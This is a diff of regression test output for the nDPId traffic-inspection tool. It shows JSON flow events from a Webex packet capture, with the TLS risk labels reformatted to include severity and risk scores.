 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
